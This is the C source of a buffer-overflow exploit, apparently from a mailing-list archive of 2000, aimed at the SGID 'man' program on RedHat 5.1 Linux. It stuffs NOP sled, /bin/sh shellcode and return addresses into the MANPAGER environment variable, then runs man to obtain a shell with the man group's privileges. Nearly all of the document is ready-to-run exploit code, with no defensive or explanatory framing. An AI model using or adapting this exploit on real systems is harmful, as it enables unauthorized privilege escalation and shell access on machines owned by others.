/* *************************************************** *** agroMANauer.c *** *** linux SGID-man exploit *** *** by buterfreeat_private 2000 *** *** tested on RedHat 5.1 *** *** It gives an egid-man shell *** *** *** *** Dedicado a Juan, Jor y la gente del chamizu *** *** (Ehhh tio, la guerra acaba de Empezar) *** *************************************************** */ #include <stdio.h> #define BUF_SIZE 5000 #define POS_RET 3500 #define RETADDR 0xbfffefef // shellcode char shellcode[] = // 48 caracteres "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh"; void main (int argc, char *argv[]) { int i; FILE *f; char buf[BUF_SIZE]; long retaddr, offset; printf ("\n"); printf ("****************************************\n"); printf ("* agroMANauer (linux SGID-man exploit) *\n"); printf ("* by buterfreeat_private 2000 * \n"); printf ("**************************************** \n\n"); printf ("Try offsets -3000,0,3000,...\n"); printf ("Use : %s [offset] \n", argv[0]); offset = 0; if (argc>1) { offset = atol (argv[1]); } retaddr = RETADDR + offset; printf ("Return Address = 0x%x \n",retaddr); // Fill buffer with NOP's memset (buf, 0x90, BUF_SIZE); buf[BUF_SIZE]=0; // Copy Return Address for (i=POS_RET; i<=BUF_SIZE-10; i+=4) { *(long*)(buf+i) = (long) retaddr; } // Copy shellCode for (i=0; i<strlen(shellcode); i++) { buf[i+POS_RET-strlen(shellcode)-20] = shellcode[i]; } // Export TERMCAP setenv ("MANPAGER", buf, 1); // Run program execl ("/usr/bin/man","man","ls",NULL); }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:37:55 PDT